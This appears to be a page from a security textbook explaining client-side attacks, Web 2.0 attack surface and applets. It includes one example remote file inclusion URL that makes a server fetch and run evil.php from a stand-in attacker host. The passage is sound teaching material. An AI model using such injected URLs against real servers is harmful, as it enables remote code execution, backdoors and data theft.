Skip to content

Page120

Client-Side Attacks

Client-side attacks occur when a user downloads malicious content. The flow of data is reversed compared to server-side attacks: client-side attacks initiate from the victim who downloads content from the attacker, as shown in Fig. 4.21.

Fig. 4.21

Client-side attacks are difficult to mitigate for organizations that allow Internet access. Clients include word processing software, spreadsheets, media players, and web browsers. Browsers such as Chrome and Firefox are actually a collection of software: the browser itself, plus third-party software such as Adobe Acrobat Reader, iTunes, QuickTime, etc. All are potentially vulnerable to client-side attacks. All client-side software must be patched, a challenge many organizations struggle with.

Most firewalls are far more restrictive inbound compared to outbound: they were designed to “keep the bad guys out,” and mitigate server-side attacks originating from untrusted networks. They often fail to prevent client-side attacks.

Web Architecture and Attacks

The World Wide Web of 15 years ago was a simpler Web: most web pages were static, rendered in HTML. The advent of “Web 2.0,” with dynamic content, multimedia, and user-created data has increased the attack surface of the Web: creating more attack vectors. Dynamic Web languages such as PHP (a “recursive acronym” that stands for PHP: Hypertext Preprocessor) make web pages far more powerful and dynamic, but also more susceptible to security attacks.

An example PHP attack is the “remote file inclusion” attack. A URL (Universal Resource Locator) such as “https://good.example.com/index.php?file=readme.txt” references a PHP script called index.php. That script dynamically loads the file referenced after the “?”, readme.txt, which displays in the browser.

An attacker hosts a malicious PHP file called “evil.php” on the Web server evil.example.com, and then manipulates the URL, entering: https://good.example.com/index.php?file=https://evil.example.com/evil.php

If good.example.com is poorly configured, it will download evil.php, and execute it locally, allowing the attacker to steal information, create a backdoor, and perform other malicious tasks.

Applets

Applets are small pieces of mobile code that are embedded in other software such as Web browsers. Unlike HTML (Hyper Text Markup Language), which provides a way to display content, applets are executables. The primary security concern is that applets are downloaded from servers, and then run locally. Malicious applets may be able to compromise the security of the client.

Applets can be written in a variety of programming languages; two prominent applet languages are Java (by Oracle/Sun Microsystems) and ActiveX (by Microsoft). The term “applet” is used for Java, and “control” for ActiveX, though they are functionally similar.